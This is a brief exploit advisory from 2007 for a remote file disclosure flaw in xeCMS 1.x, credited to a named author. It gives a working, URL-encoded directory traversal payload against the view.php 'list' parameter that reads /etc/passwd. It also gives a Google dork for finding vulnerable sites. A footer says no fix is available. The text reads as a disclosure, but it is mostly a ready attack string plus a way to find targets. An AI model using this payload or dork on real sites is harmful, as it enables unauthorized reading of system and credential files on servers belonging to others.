xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability

2007-12-19 00:00:00

--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download : http://xecms.sunsite.dk/
author : p4imi0
contact : [email protected]
exploit : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to : str0ke, Cr[]w.

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.